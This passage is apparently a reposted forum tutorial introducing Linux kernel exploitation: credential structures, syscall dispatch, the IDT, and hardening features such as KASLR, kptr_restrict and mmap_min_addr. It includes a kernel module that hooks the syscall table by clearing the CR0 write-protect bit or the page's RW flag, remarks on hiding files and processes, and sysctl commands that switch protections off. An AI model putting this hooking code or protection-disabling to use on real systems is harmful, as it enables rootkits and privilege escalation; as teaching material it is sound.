things could have been done, such as playing with the PFN or page or reading from the Physical Address with void __iomem *, ioremap() and memcpy_fromio() or struct page * and kmap(). Translating address from virtual to physical takes time, so caching is implemented using the TLB(Translation Lookaside Buffer) to improve the performance, hopefully that the next access is going to land a cache-hit and that’ll hand the PTE faster than a miss where a memory access is forced to happen to get it. The TLB flushes from time to another, an example would be after a page fault is raised and completed. Processes: The kernel sees each process as a struct task_struct which is a huge struct that contains many fields which we can’t cover entirely, some are used to guarantee the (almost) fair scheduling and some show the task’s state(if it’s either unrunnable, runnable or stopped), priority, the parent process, a linked list of children processes, the address space it holds, and many others. We are mainly interested in the const struct cred __rcu *cred; which holds the task’s credentials. struct cred { atomic_t usage; #ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; void *put_addr; unsigned magic; #define CRED_MAGIC 0x43736564 #define CRED_MAGIC_DEAD 0x44656144 #endif kuid_t uid; kgid_t gid; kuid_t suid; kgid_t sgid; kuid_t euid; kgid_t egid; kuid_t fsuid; kgid_t fsgid; unsigned securebits; kernel_cap_t cap_inheritable; kernel_cap_t cap_permitted; kernel_cap_t cap_effective; kernel_cap_t cap_bset; kernel_cap_t cap_ambient; #ifdef CONFIG_KEYS unsigned char jit_keyring; struct key __rcu *session_keyring; struct key *process_keyring; struct key *thread_keyring; struct key *request_key_auth; #endif #ifdef CONFIG_SECURITY void *security; #endif struct user_struct *user; struct user_namespace *user_ns; struct group_info *group_info; struct rcu_head rcu; } __randomize_layout; This struct holds Capabilities, ((effective) user and group) ID, keyrings, (for synchronization, Read-Copy-Update) RCU, (tracks the user’s usage of the system by keeping counts) user and (holds U/G ID and the privileges for them) user_ns. In order to better understand this structure, a simple proc entry was created which extracts the task_struct of the process that uses it(current) and reads the effective UID and GID. #include <linux/module.h> #include <linux/kernel.h> #include <linux/proc_fs.h> #include <linux/sched.h> #include <linux/uaccess.h> #include <linux/cred.h> #include <linux/uidgid.h> #define device_name "useless" #define SD_PRIV 0x10071007 struct{ kuid_t ceuid; kgid_t cegid; spinlock_t clock; }us_cd; long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ int res; switch(cmd){ case SD_PRIV: spin_lock(&us_cd.clock); current_euid_egid(&us_cd.ceuid, &us_cd.cegid); spin_unlock(&us_cd.clock); res = copy_to_user((void *)arg, &us_cd, 8); return res; default: return -EINVAL; } } struct file_operations fileops = { .owner = THIS_MODULE, .unlocked_ioctl = do_ioctl, }; static int us_init(void){ struct proc_dir_entry *res; spin_lock_init(&us_cd.clock); res = proc_create(device_name, 0, NULL, &fileops); if(res == NULL){ printk(KERN_ERR "Failed allocating a proc entry."); return -ENOMEM; } return 0; } static void us_exit(void){ remove_proc_entry(device_name, NULL); } MODULE_LICENSE("GPU"); module_init(us_init); module_exit(us_exit); The initialization process starts by preparing the spinlock and creating a proc entry with a specified name “useless” and a file_operations struct containing only necessary owner and unlocked_ioctl entries. While the ioctl handler simply checks if the command passed was SD_PRIV to extract the UID and GID with a call to the current_euid_egid() macro which in turn calls current_cred() to extract the current->cred: #define current_euid_egid(_euid, _egid) \ do { \ const struct cred *__cred; \ __cred = current_cred(); \ *(_euid) = __cred->euid; \ *(_egid) = __cred->egid; \ } while(0) #define current_cred() \ rcu_dereference_protected(current->cred, 1) Then, we create a tasktry.c to interract with the /proc/useless. #include <stdio.h> #include <string.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #define device_path "/proc/useless" #define SD_PRIV 0x10071007 struct{ unsigned int uid; unsigned int gid; }data; void main(void){ int fd; fd = open(device_path, O_RDONLY); ioctl(fd, SD_PRIV, &data); printf("UID: %d GID: %d\n", data.uid, data.gid); } Two binaries are then created in /tmp directory, one which is compiled by root(setuid bit set) tasktry_root and the other by a normal user called tasktry_user. root@Nwwz:~# cd /tmp root@Nwwz:/tmp# gcc tasktry.c -o tasktry_root; chmod u+s tasktry_root root@Nwwz:/tmp# cd /root/mod root@Nwwz:~/mod# make make -c /lib/modules/4.17.0/build M=/root/mod modules make[1]: Entering directory '/usr/src/linux-4.17.2' CC [M] /root/mod/task.o Building modules, stage 2. MODPOST 1 modules CC /root/mod/task.mod.o LD [M] /root/mod/task.ko make[1]: Leaving directory '/usr/src/linux-4.17.2' root@Nwwz:~/mod# insmod task.ko root@Nwwz:~/mod# su - user user@Nwwz:~$ cd /tmp user@Nwwz:/tmp$ gcc tasktry.c -o tasktry_user user@Nwwz:/tmp$ ls tasktry_user tasktry_root tasktry.c user@Nwwz:/tmp$ ./tasktry_root UID: 0 GID: 1000 user@Nwwz:/tmp$ ./tasktry_user UID: 1000 GID: 1000 As you can see, the effective UID of tasktry_root is 0 making it own high privileges, so overwritting effective creds is one way to privilege escalation(prepare_kernel_creds() and commit_creds() are used for this purpose in most exploits, instead of getting the stack base and overwritting it directly.), another is to change capabilities. On Windows, one way to escalate privileges would be to steal the token of System process(ID 4) and assign it to the newly spawned cmd.exe after changing the reference count: image.png910x355 33.2 KB Syscalls: Processes running in userspace can still communicate with the kernel, thanks to syscalls. Each syscall is defined as follows: SYSCALL_DEFINE0(getpid) { return task_tgid_vnr(current); } With multiple arguments: SYSCALL_DEFINE3(lseek, unsigned int, fd, off_t, offset, unsigned int, whence) { return ksys_lseek(fd, offset, whence); } So, in general: SYSCALL_DEFINE[ARG_COUNT]([SYSCALL_NAME], [ARG_TYPE], [ARG_NAME]){ /* Passing the argument to another function, for processing. */ return call_me([ARG_NAME]); } Few tries aaand : #include <stdio.h> #include <string.h> #include <unistd.h> int main(void){ printf("ID: %d\n", getuid()); return 0; } Running this sample with GDB and putting breakpoint on the x64 libc, we can see that it does set EAX register to 0x66(syscall number on x64) before the syscall instruction. (gdb) x/i $rip => 0x555555554704 <main+4>: callq 0x5555555545a0 <getuid@plt> (gdb) x/x getuid 0x7ffff7af2f30 <getuid>: 0x000066b8 (gdb) b* getuid Breakpoint 2 at 0x7ffff7af2f30: file ../sysdeps/unix/syscall-template.S, line 65. (gdb) c Continuing. Breakpoint 2, getuid () at ../sysdeps/unix/syscall-template.S:65 65 ../sysdeps/unix/syscall-template.S: No such file or directory. (gdb) disas $rip Dump of assembler code for function getuid: => 0x00007ffff7af2f30 <+0>: mov $0x66,%eax 0x00007ffff7af2f35 <+5>: syscall 0x00007ffff7af2f37 <+7>: retq End of assembler dump. (gdb) shell root@Nwwz:~# echo "g" > /proc/sysrq-trigger We can invoke a shell from GDB to force SysRQ, and see what this offset in the kernel links for: [New Thread 756] [New Thread 883] [New Thread 885] Thread 103 received signal SIGTRAP, Trace/breakpoint trap. [Switching to Thread 889] kgdb_breakpoint () at kernel/debug/debug_core.c:1073 10733 wmb(); /* Sync point after breakpoint */ (gdb) p &sys_call_table $1 = (const sys_call_ptr_t (*)[]) 0xffffffff81c00160 <sys_call_table> (gdb) x/gx (void *)$1 + 0x66*8 0xffffffff81c00490 <sys_call_table+816>: 0xffffffff8108ec60 (gdb) x/i 0xffffffff8108ec60 0xffffffff8108ec60 <__x64_sys_getuid>: nopl 0x0(%rax,%rax,1) So, it’s the global sys_call_table, indexing the __x64_sys_getuid there. "The __x64_sys_*() stubs are created on-the-fly for sys_*() system calls" is written in syscall_64.tbl that contains all the syscalls available to the kernel. This is similiar to the nt!KiServiceTable on Windows. kd> dps nt!KeServiceDescriptorTable 82b759c0 82a89d9c nt!KiServiceTable 82b759c4 00000000 82b759c8 00000191 82b759cc 82a8a3e4 nt!KiArgumentTable 82b759d0 00000000 82b759d4 00000000 kd> dd nt!KiServiceTable 82a89d9c 82c85c28 82acc40d 82c15b68 82a3088a 82a89dac 82c874ff 82b093fa 82cf7b05 82cf7b4e 82a89dbc 82c0a3bd 82d11368 82d125c1 82c00b95 kd> ln 82c85c28 (82c85c28) nt!NtAcceptConnectPort | (82c85ca5) nt!EtwpRundownNotifications Exact matches: nt!NtAcceptConnectPort = <no type information> kd> ln 82acc40d (82acc40d) nt!NtAccessCheck | (82acc43e) nt!PsGetThreadId Exact matches: nt!NtAccessCheck = <no type information> kd> ln 82d125c1 (82d125c1) nt!NtAddDriverEntry | (82d125f3) nt!NtDeleteDriverEntry Exact matches: nt!NtAddDriverEntry = <no type information> Dissasembling it gives us: (gdb) disas __x64_sys_getuid Dump of assembler code for function __x64_sys_getuid: 0xffffffff8108ec60 <+0>: nopl 0x0(%rax,%rax,1) 0xffffffff8108ec65 <+5>: mov %gs:0x15c00,%rax 0xffffffff8108ec6e <+14>: mov 0x668(%rax),%rax 0xffffffff8108ec75 <+21>: mov 0x4(%rax),%esi 0xffffffff8108ec78 <+24>: mov 0x88(%rax),%rdi 0xffffffff8108ec7f <+31>: callq 0xffffffff8112d4a0 <from_kuid_munged> 0xffffffff8108ec84 <+36>: mov %eax,%eax 0xffffffff8108ec86 <+38>: retq With a basic understanding of ASM and a very limited knowledge of the kernel (AT&T haha, too lazy to switch the syntax .), one can know that it does first search for the current task, store some pointer it holds at offset 0x668 at RAX before dereferencing it again and using content at +0x88(RDI) and +0x4(RSI) as arguments to the from_kuid_munged call before it nops and returns(q there stands for qword). We can verify this either by looking at the source: SYSCALL_DEFINE0(getuid) { return from_kuid_munged(current_user_ns(), current_uid()); } uid_t from_kuid_munged(struct user_namespace *targ, kuid_t kuid) { uid_t uid; uid = from_kuid(targ, kuid); if (uid == (uid_t) -1) uid = overflowuid; return uid; } EXPORT_SYMBOL(from_kuid_munged); Or checking in GDB(maybe both?😞 (gdb) b* __x64_sys_getuid Breakpoint 1 at 0xffffffff8108ec60: file kernel/sys.c, line 920. (gdb) c [New Thread 938] [Switching to Thread 938] Thread 122 hit Breakpoint 1, __x64_sys_getuid () at kernel/sys.c:920 920 { (gdb) ni get_current () at ./arch/x86/include/asm/current.h:15 15 return this_cpu_read_stable(current_task); (gdb) x/i $rip => 0xffffffff8108ec65 <__x64_sys_getuid+5>: mov %gs:0x15c00,%rax (gdb) p ((struct task_struct *)0)->cred Cannot access memory at address 0x668 (gdb) p ((struct cred *)0)->uid Cannot access memory at address 0x4 (gdb) p ((struct cred *)0)->user_ns Cannot access memory at address 0x88 The sys_call_table is residing in a RO(read only) memory space: (gdb) x/x sys_call_table 0xffffffff81c00160 <sys_call_table>: 0xffffffff81247310 (gdb) maintenance info sections ... [3] 0xffffffff81c00000->0xffffffff81ec1a42 at 0x00e00000: .rodata ALLOC LOAD RELOC DATA HAS_CONTENTS ... (gdb) But a kernel module can overcome this protection and place a hook at any systemcall. For that, two example modules will be given: =] Disabling the previously discussed WP(write-protect) bit in the CR0(control register #0), using read_cr0 and write_cr0 to acheive that. #include <linux/fs.h> #include <asm/pgtable.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/uaccess.h> #include <linux/kallsyms.h> #include <linux/miscdevice.h> #include <asm/special_insns.h> #define device_name "hookcontrol" #define ioctl_base 0x005ec #define ioctl_enable ioctl_base+1 #define ioctl_disable ioctl_base+2 int res; int (*real_getuid)(void); void **sys_call_table; unsigned long const *address; static int hooked_getuid(void){ printk(KERN_INFO "Received getuid call from %s!", current->comm); if(real_getuid != NULL){ return real_getuid(); } return 0; } long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ unsigned long cr0 = read_cr0(); switch(cmd){ case ioctl_enable: printk(KERN_INFO "Enabling hook!"); write_cr0(cr0 & ~0x10000); sys_call_table[__NR_getuid] = hooked_getuid; write_cr0(cr0 | 0x10000); printk(KERN_INFO "Successfully changed!"); return 0; case ioctl_disable: printk(KERN_INFO "Disabling hook!"); write_cr0(cr0 & ~0x10000); sys_call_table[__NR_getuid] = real_getuid; write_cr0(cr0 | 0x10000); printk(KERN_INFO "Successfully restored!"); return 0; default: return -EINVAL; } } struct file_operations file_ops = { .owner = THIS_MODULE, .unlocked_ioctl = do_ioctl }; struct miscdevice hk_dev = { MISC_DYNAMIC_MINOR, device_name, &file_ops }; static int us_init(void){ res = misc_register(&hk_dev); if(res){ printk(KERN_ERR "Couldn't load module!"); return -1; } sys_call_table = (void *) kallsyms_lookup_name("sys_call_table"); real_getuid = sys_call_table[__NR_getuid]; address = (unsigned long *) &sys_call_table; printk(KERN_INFO "Module successfully loaded with minor: %d!", hk_dev.minor); return 0; } static void us_exit(void){ misc_deregister(&hk_dev); } MODULE_LICENSE("GPL"); module_init(us_init); module_exit(us_exit); =] Orr’ing the protection mask of the page at which it resides(__pgprot(_PAGE_RW))( set_memory_rw() & set_memory_rw()), or directly modifying the PTE. static inline pte_t pte_mkwrite(pte_t pte) { return pte_set_flags(pte, _PAGE_RW); } static inline pte_t pte_wrprotect(pte_t pte) { return pte_clear_flags(pte, _PAGE_RW); } Looking at these functions, one can safely assume that manipulation can be acheived with simple OR and AND(_PAGE_RW) operations on the pte_t. pte_t *lookup_address(unsigned long address, unsigned int *level) { return lookup_address_in_pgd(pgd_offset_k(address), address, level); } Since it’s a kernel address, pgd_offset_k() is called, which makes use of &init_mm, instead of a mm_struct belonging to some process of one’s choice. pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address, unsigned int *level) { p4d_t *p4d; pud_t *pud; pmd_t *pmd; *level = PG_LEVEL_NONE; if (pgd_none(*pgd)) return NULL; p4d = p4d_offset(pgd, address); if (p4d_none(*p4d)) return NULL; *level = PG_LEVEL_512G; if (p4d_large(*p4d) || !p4d_present(*p4d)) return (pte_t *)p4d; pud = pud_offset(p4d, address); if (pud_none(*pud)) return NULL; *level = PG_LEVEL_1G; if (pud_large(*pud) || !pud_present(*pud)) return (pte_t *)pud; pmd = pmd_offset(pud, address); if (pmd_none(*pmd)) return NULL; *level = PG_LEVEL_2M; if (pmd_large(*pmd) || !pmd_present(*pmd)) return (pte_t *)pmd; *level = PG_LEVEL_4K; return pte_offset_kernel(pmd, address); } so, the ioctl handler looks like this: long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ unsigned int level; pte_t *pte = lookup_address(*address, &level);; switch(cmd){ case ioctl_enable: printk(KERN_INFO "Enabling hook!"); pte->pte |= _PAGE_RW; sys_call_table[__NR_getuid] = hooked_getuid; pte->pte &= ~_PAGE_RW; printk(KERN_INFO "Successfully changed!"); return 0; case ioctl_disable: printk(KERN_INFO "Disabling hook!"); pte->pte |= _PAGE_RW; sys_call_table[__NR_getuid] = real_getuid; pte->pte &= ~_PAGE_RW; printk(KERN_INFO "Successfully restored!"); return 0; default: return -EINVAL; } } (Know that these are only examples, usually, replacing should take place at init and restoring the original at exit, plus the definition of both the hook and original handlers, should hold asmlinkage(passing arguments in stack, unlike fastcall(default) in registers), however, since the syscall here holds no arguments, this was ignored.) By running an application from user-space to interact with /dev/hookcontrol: (enabling and disabling after a while) and taking a look at dmesg: This can be used to provide a layer on the syscall, prevent or manipulate the return value, like kill to prevent a process from being killed, getdents to hide some files, unlink to prevent a file from being deleted, et cetera… And it doesn’t stop here, even without syscall hooking, one can play with processes(hide them as an example…) with task_struct elements and per-task flags, or change the file_operations in some specific struct, and many other possibilities. IDT(Interrupt Descriptor Table): In order to handle exceptions, this table exists, by linking a specific handler to each exception, it helps deal with those raised from userspace(a translation to ring zero is required first) and kernelspace. It first is initialized during early setup, and this can be seen in setup_arch() which calls multiple functions, some to setup the IDT, most important to us is idt_setup_traps(): void __init idt_setup_traps(void) { idt_setup_from_table(idt_table, def_idts, ARRAY_SIZE(def_idts), true); } It makes use of the default IDTs array(def_idts). static const __initconst struct idt_data def_idts[] = { INTG(X86_TRAP_DE, divide_error), INTG(X86_TRAP_NMI, nmi), INTG(X86_TRAP_BR, bounds), INTG(X86_TRAP_UD, invalid_op), INTG(X86_TRAP_NM, device_not_available), INTG(X86_TRAP_OLD_MF, coprocessor_segment_overrun), INTG(X86_TRAP_TS, invalid_TSS), INTG(X86_TRAP_NP, segment_not_present), INTG(X86_TRAP_SS, stack_segment), INTG(X86_TRAP_GP, general_protection), INTG(X86_TRAP_SPURIOUS, spurious_interrupt_bug), INTG(X86_TRAP_MF, coprocessor_error), INTG(X86_TRAP_AC, alignment_check), INTG(X86_TRAP_XF, simd_coprocessor_error), #ifdef CONFIG_X86_32 TSKG(X86_TRAP_DF, GDT_ENTRY_DOUBLEFAULT_TSS), #else INTG(X86_TRAP_DF, double_fault), #endif INTG(X86_TRAP_DB, debug), #ifdef CONFIG_X86_MCE INTG(X86_TRAP_MC, &machine_check), #endif SYSG(X86_TRAP_OF, overflow), #if defined(CONFIG_IA32_EMULATION) SYSG(IA32_SYSCALL_VECTOR, entry_INT80_compat), #elif defined(CONFIG_X86_32) SYSG(IA32_SYSCALL_VECTOR, entry_INT80_32), #endif }; On x86_32 as an example, when an int 0x80 is raised. the following happens: static __always_inline void do_syscall_32_irqs_on(struct pt_regs *regs) { struct thread_info *ti = current_thread_info(); unsigned int nr = (unsigned int)regs->orig_ax; #ifdef CONFIG_IA32_EMULATION ti->status |= TS_COMPAT; #endif if (READ_ONCE(ti->flags) & _TIF_WORK_SYSCALL_ENTRY) { nr = syscall_trace_enter(regs); } if (likely(nr < IA32_NR_syscalls)) { nr = array_index_nospec(nr, IA32_NR_syscalls); #ifdef CONFIG_IA32_EMULATION regs->ax = ia32_sys_call_table[nr](regs); #else regs->ax = ia32_sys_call_table[nr]( (unsigned int)regs->bx, (unsigned int)regs->cx, (unsigned int)regs->dx, (unsigned int)regs->si, (unsigned int)regs->di, (unsigned int)regs->bp); #endif } syscall_return_slowpath(regs); } __visible void do_int80_syscall_32(struct pt_regs *regs) { enter_from_user_mode(); local_irq_enable(); do_syscall_32_irqs_on(regs); } It would call enter_from_user_mod() to , then enable Interrupt Requests(IRQs) on the current CPU. Push the saved registers to find the syscall number(EAX), use it as an index in the ia32_sys_call_table array. Arguments are passed to the handler in registers with the following order: EBX, ECX, EDX, ESI, EDI, EBP. However, the first object as seen in the idt_table is the X86_TRAP_DE(divide error). This can be seen from GDB, that the first gate within idt_table holds the offset_high, offset_middle and offset_low referencing divide_error. Which would deal with division by 0 exceptions. (gdb) p idt_table $1 = 0xffffffff82598000 <idt_table> (gdb) p/x *(idt_table + 0x10*0) $2 = {offset_low = 0xb90, segment = 0x10, bits = {ist = 0x0, zero = 0, type = 14, dpl = 0, p = 1}, offset_middle = 0x8180, offset_high = 0xffffffff, reserved = 0x0} (gdb) x/8i 0xffffffff81800b90 0xffffffff81800b90 <divide_error>: nopl (%rax) 0xffffffff81800b93 <divide_error+3>: pushq $0xffffffffffffffff 0xffffffff81800b95 <divide_error+5>: callq 0xffffffff81801210 <error_entry> 0xffffffff81800b9a <divide_error+10>: mov %rsp,%rdi 0xffffffff81800b9d <divide_error+13>: xor %esi,%esi 0xffffffff81800b9f <divide_error+15>: callq 0xffffffff81025d60 <do_devide_error> 0xffffffff81800ba4 <divide_error+20>: jmpq 0xffffffff81801310 <error_exit> You can see that it’s DPL is zero, that is, an int $0x00 from a userland process wouldn’t help reaching it(unlike int $0x03, int $0x04 or int $0x80). Gate descriptors are initialized in idt_setup_from_table which calls idt_init_desc: idt_setup_from_table(gate_desc *idt, const struct idt_data *t, int size, bool sys) { gate_desc desc; for (; size > 0; t++, size--) { idt_init_desc(&desc, t); write_idt_entry(idt, t->vector, &desc); if (sys) set_bit(t->vector, system_vectors); } } And here it is. static inline void idt_init_desc(gate_desc *gate, const struct idt_data *d) { unsigned long addr = (unsigned long) d->addr; gate->offset_low = (u16) addr; gate->segment = (u16) d->segment; gate->bits = d->bits; gate->offset_middle = (u16) (addr >> 16); #ifdef CONFIG_X86_64 gate->offset_high = (u32) (addr >> 32); gate->reserved = 0; #endif } This could be used by the attacker, such as by getting the IDT address using the SIDT instruction, and looking for a specific handler in the list, incrementing offset_high would set it to 0. As we said above, we're going to use the IDT and overwrite one of its entries (more precisely a Trap Gate, so that we're able to hijack an exception handler and redirect the code-flow towards userspace). Each IDT entry is 64-bit (8-bytes) long and we want to overflow the 'base_offset' value of it, to be able to modify the MSB of the exception handler routine address and thus redirect it below PAGE_OFFSET (0xc0000000) value. ~ Phrack 2 KSPP: This is a protection that appeared starting from 4.8, it’s name is a short for: “Kernel self-protection project”, It does provide additional checks on copy_to_user() and copy_from_user() to prevent classic buffer-overflows bugs from happening, by checking the saved compile-time buffer size and making sure it fits. if not, abort and prevent any possible exploitation from happening. root@Nwwz:~/mod# cd /usr/src root@Nwwz:/usr/src# cd linux-4.17.2 root@Nwwz:/usr/src/linux-4.17.2# cd include root@Nwwz:/usr/src/linux-4.17.2/include# nano uaccess.h We can directly see a check that’s likely to be 1, before proceeding to the copy operation: static __always_inline unsigned long __must_check copy_from_user(void *to, const void __user *from, unsigned long n) { if (likely(check_copy_size(to, n, false))) n = _copy_from_user(to, from, n); return n; } static __always_inline unsigned long __must_check copy_to_user(void __user *to, const void *from, unsigned long n) { if (likely(check_copy_size(from, n, true))) n = _copy_to_user(to, from, n); return n; } The check function is as follows, it does first check the compile-time size against the requested size, and calls __bad_copy_from() or __bad_copy_to() depending on the boolean is_source if it seems like an overflow is possible, which is unlikely of course(or not?), it then returns false. If not, it does call check_object_size() and returns true. extern void __compiletime_error("copy source size is too small") __bad_copy_from(void); extern void __compiletime_error("copy destination size is too small") __bad_copy_to(void); static inline void copy_overflow(int size, unsigned long count) { WARN(1, "Buffer overflow detected (%d < %lu)!\n", size, count); } static __always_inline bool check_copy_size(const void *addr, size_t bytes, bool is_source) { int sz = __compiletime_object_size(addr); if (unlikely(sz >= 0 && sz < bytes)) { if (!__builtin_constant_p(bytes)) copy_overflow(sz, bytes); else if (is_source) __bad_copy_from(); else __bad_copy_to(); return false; } check_object_size(addr, bytes, is_source); return true; } This function is simply just a wrapper around __check_object_size(). #ifdef CONFIG_HARDENED_USERCOPY extern void __check_object_size(const void *ptr, unsigned long n, bool to_user); static __always_inline void check_object_size(const void *ptr, unsigned long n, bool to_user) { if (!__builtin_constant_p(n)) __check_object_size(ptr, n, to_user); } #else static inline void check_object_size(const void *ptr, unsigned long n, bool to_user) { } #endif Additional checks are provided here in __check_object_size(), and as the comment says, not a kernel .text address, not a bogus address and is a safe heap or stack object. void __check_object_size(const void *ptr, unsigned long n, bool to_user) { if (static_branch_unlikely(&bypass_usercopy_checks)) return; if (!n) return; check_bogus_address((const unsigned long)ptr, n, to_user); check_heap_object(ptr, n, to_user); switch (check_stack_object(ptr, n)) { case NOT_STACK: break; case GOOD_FRAME: case GOOD_STACK: return; default: usercopy_abort("process stack", NULL, to_user, 0, n); } check_kernel_text_object((const unsigned long)ptr, n, to_user); } EXPORT_SYMBOL(__check_object_size); With this, it does provide enough to block and kill classic buffer-overflow bugs, this can be disabled by commenting the check and recompiling a module. KASLR: Stands for Kernel Address Space Layout Randomization. It’s similiar to the ASLR on userspace which protects the stack and heap addresses from being at the same location in two different runs(unless the attacker gets lucky ). PIE too since it does target the main binary segments which are text, data and bss. This protection randomizes the kernel segments(Exception table, text, data…) at each restart(boot), we’ve previously disabled it by using the nokaslr at the kernel command line. In order to experiment on it, this was removed and specific symbols in /proc/kallsyms were then fetched on two different runs. First run: Second run: This shows that addresses are randomly assigned on boottime to _stext and _sdata, whereas their end is just the start address plus a size which doesn’t change in this case(0x21dc0 for .data, 0x6184d1 for .text), note that .data is on a constant distance from .text. So if the attacker gets the .text base address(which is the result of a leak), he can know the location of all the kernel symbols even with no access to kallsyms using RVAs(or offsets), but he’ll have to compile the target kernel in his box to get them. This is for example used when SMEP is on and one has to go for ROP to disable it first, and then redirect execution to a shellcode placed in userspace(< TASK_SIZE). kptr_restrict: This protection prevents kernel addresses from being exposed to the attacker. It does stop %pK format from dumping an address, and it’s work depends on the kptr_restrict value(0, 1 or 2). Kernel Pointers: %pK 0x01234567 or 0x0123456789abcdef For printing kernel pointers which should be hidden from unprivileged users. The behaviour of %pK depends on the kptr_restrict sysctl - see Documentation/sysctl/kernel.txt for more details. This can be seen in kprobe_blacklist_seq_show() which performs a check with a call to kallsyms_show_value(), depending on it, it would or would not print the start and end addresses. static int kprobe_blacklist_seq_show(struct seq_file *m, void *v) { struct kprobe_blacklist_entry *ent = list_entry(v, struct kprobe_blacklist_entry, list); if (!kallsyms_show_value()) seq_printf(m, "0x%px-0x%px\t%ps\n", NULL, NULL, (void *)ent->start_addr); else seq_printf(m, "0x%px-0x%px\t%ps\n", (void *)ent->start_addr, (void *)ent->end_addr, (void *)ent->start_addr); return 0; } What kallsyms_show_value() does is shown here: int kallsyms_show_value(void) { switch (kptr_restrict) { case 0: if (kallsyms_for_perf()) return 1; case 1: if (has_capability_noaudit(current, CAP_SYSLOG)) return 1; default: return 0; } } If kptr_restrict value is 0, it does call kallsyms_for_perf() to check if sysctl_perf_event_paranoid value is smaller or equal to 1, returns 1 if true. If it’s 1, it checks if CAP_SYSLOG is within the user’s capabilities, if true, it returns 1. Otherwise, it returns 0. Disabling this protection can be done by setting /proc/sys/kernel/kptr_restrict content to 0. Or using sysctl to do that: sysctl -w kernel.kptr_restrict=0 But watchout for perf_event_paranoid too, if it’s > 1, then it needs to be adjusted. This is an example on the default kernel run by my Debian VM: user@Nwwz:~$ cd /proc/self user@Nwwz:/proc/self$ cat stack [<ffffffff81e7c869>] do_wait+0x1c9/0x240 [<ffffffff81e7d9ab>] SyS_wait4+0x7b/0xf0 [<ffffffff81e7b550>] task_stopped_code+0x50/0x50 [<ffffffff81e03b7d>] do_syscall_64+0x8d/0xf0 [<ffffffff8241244e>] entry_SYSCALL_64_after_swapgs+0x58/0xc6 [<ffffffffffffffff>] 0xffffffffffffffff However, in the 4.17 kernel, we get this, because of perf_event_paranoid: root@Nwwz:~# cd /proc/self root@Nwwz:/proc/self# cat stack [<0>] do_wait+0x1c9/0x240 [<0>] kernel_wait4+0x8d/0x140 [<0>] __do_sys_wait4+0x95/0xa0 [<0>] do_syscall_64+0x55/0x100 [<0>] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [<0>] 0xffffffffffffffff root@Nwwz:/proc/self# cat /proc/sys/kernel/kptr_restrict 0 root@Nwwz:/proc/self# cat /proc/sys/kernel/perf_event_paranoid 2 mmap_min_addr: The mm_struct within task_struct holds an operation function called get_unmapped_area. struct mm_struct { ... #ifdef CONFIG_MMU unsigned long (*get_unmapped_area) (struct file *filp, unsigned long addr, unsigned long len, unsigned long pgoff, unsigned long flags); #endif ... } It is then extracted in get_unmapped_area(), which tries to get it from the mm(mm_struct), before checking it’s file and it’s file_operations or if it has the MAP_SHARED flag and assign shmem_get_unmapped_area() to it. However, within the mm_struct, the default value of get_unmapped_area is the arch specific function. This function does search for a large enough memory block to satisfy the request, but before returning the addr, it does check if it’s bigger or equal to mmap_min_addr, which means that any address below it will not be given, this prevents NULL pointer dereference attack from happening(no mmaping NULL address, nothing will be stored there(shellcode, pointers…)). Disabling this protection can be done by setting /proc/sys/vm/mmap_min_addr content to 0, or using sysctl like before. sysctl -w vm.mmap_min_addr=0 addr_limit: The thread(thread_struct) within the task_struct contains some important fields, amongst them, is the addr_limit. typedef struct { unsigned long seg; } mm_segment_t; struct thread_struct { ... mm_segment_t addr_limit; unsigned int sig_on_uaccess_err:1; unsigned int uaccess_err:1; ... }; This can be read with a call to get_fs(), changed with set_fs(): #define MAKE_MM_SEG(s) ((mm_segment_t) { (s) }) #define KERNEL_DS MAKE_MM_SEG(-1UL) #define USER_DS MAKE_MM_SEG(TASK_SIZE_MAX) #define get_ds() (KERNEL_DS) #define get_fs() (current->thread.addr_limit) static inline void set_fs(mm_segment_t fs) { current->thread.addr_limit = fs; set_thread_flag(TIF_FSCHECK); } When userspace likes to reach an address, it is checked against this first, so overwritting it with -1UL(KERNEL_DS) would let you access(read or write) to kernelspace. This was the introduction, I’ve noticed that it has grown bigger than I expected, so I stopped, and removed parts about protections 4, side-channel 2 attacks 3 and others. Starting this was possible, thanks to: @_py(DA BEST), @pry0cc, @Evalion, @4w1il, @ricksanchez and @Leeky. See y’all in part 1, peace. “nothing is enough, search more to learn more”. ~ exploit Sursa: https://0x00sec.org/t/point-of-no-c3-linux-kernel-exploitation-part-0/11585
    1 point
×
×
  • Create New...